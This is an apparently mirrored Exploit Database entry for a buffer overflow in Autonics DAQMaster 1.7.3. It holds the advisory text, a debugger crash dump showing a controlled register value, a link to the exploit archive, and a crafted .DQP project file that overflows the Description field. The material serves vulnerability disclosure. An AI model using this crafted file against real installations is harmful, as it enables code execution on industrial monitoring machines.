Autonics DAQMaster 1.7.3 – DQP Parsing Buffer Overflow Code Execution (PoC)

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2016-02-01
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39393/

• 
  Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
  
  
  Vendor: Autonics Corporation
  Product web page: https://www.autonics.com
  Affected version: 1.7.3 (build 2454)
  1.7.0 (build 2333)
  1.5.0 (build 2117)
  
  Summary: DAQMaster is comprehensive device management program
  that can be used with Autonics thermometers, panel meters,
  pulse meters, and counters, etc and with Konics recorders,
  indicators. DAQMaster provides GUI control for easy and convenient
  management of parameters and multiple device data monitoring.
  
  Desc: The vulnerability is caused due to a boundary error in the
  processing of a project file, which can be exploited to cause a
  buffer overflow when a user opens e.g. a specially crafted .DQP
  project file with a large array of bytes inserted in the 'Description'
  element. Successful exploitation could allow execution of arbitrary
  code on the affected machine.
  
  ---------------------------------------------------------------------
  
  (ee8.1ee8): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
  eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010206
  DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
  00405d45 8b10mov edx,dword ptr [eax]ds:002b:41414141=????????
  
  ---------------------------------------------------------------------
  
  Tested on: Microsoft Windows 7 Professional SP1 (EN)
   Microsoft Windows 7 Ultimate SP1 (EN)
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5302
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
  
  
  20.11.2015
  
  --
  
  
  thricer.dqp project PoC:
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39393.zip
  ------------------------
  
  <DAQMaster xmlns="http://www.w3.org/2001/XMLSchema-instance">
  <Project>
   <General>
  <Name>Noname</Name>
  <Company></Company>
  <Worker></Worker>
  <Description>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]</Description>
  <DataFolder>C:\Users\zslab\Documents</DataFolder>
  <DeskLayout>0</DeskLayout>
  <NameRule></NameRule>
  <FileType>0</FileType>
  <RunMode>0</RunMode>
  <Schedule Active="0"/>
  <Layout>0</Layout>
   </General>
  <System/>
  <UserTag/>
  <DDEServer/>
  <WorkSpace WorkSpaceNum="1">
  <WorkSpace>DAQ WorkSpace</WorkSpace>
  </WorkSpace>
  <UIList/>
  <Layout/>
  </Project>
  </DAQMaster>